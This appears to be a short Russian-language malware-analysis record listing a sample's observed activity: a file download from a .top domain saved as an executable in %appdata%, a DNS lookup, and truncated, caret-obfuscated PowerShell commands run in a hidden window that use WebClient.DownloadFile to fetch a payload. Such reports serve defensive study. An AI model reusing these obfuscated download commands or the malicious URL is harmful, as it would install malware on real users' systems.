Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwER^s^HELl.eX^E^ ^-eX^eCU^T^iOnPol^ICy ByPaSS ^-^N^O^p^r^o^F^I^lE -winDOWs^TYLe ^HI^dDeN ^(n^e^w^-oBJe^ct^ sy^St^Em.NE^T^.^w^Eb^ClIeNT).D^OwNload^FIl^e(^'http://www.fapoergol.t...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "POwER^s^HELl.eX^E^ ^-eX^eCU^T^iOnPol^ICy ByPaSS ^-^N^O^p^r^o^F^I^lE -winDOWs^TYLe ^HI^dDeN ^(n^e^w^-oBJe^ct^ sy^St^Em.NE^T^.^w^Eb^ClIeNT).D^OwNload^FIl^e(^'http://www.fapoergol.t...' (со скрытым окном)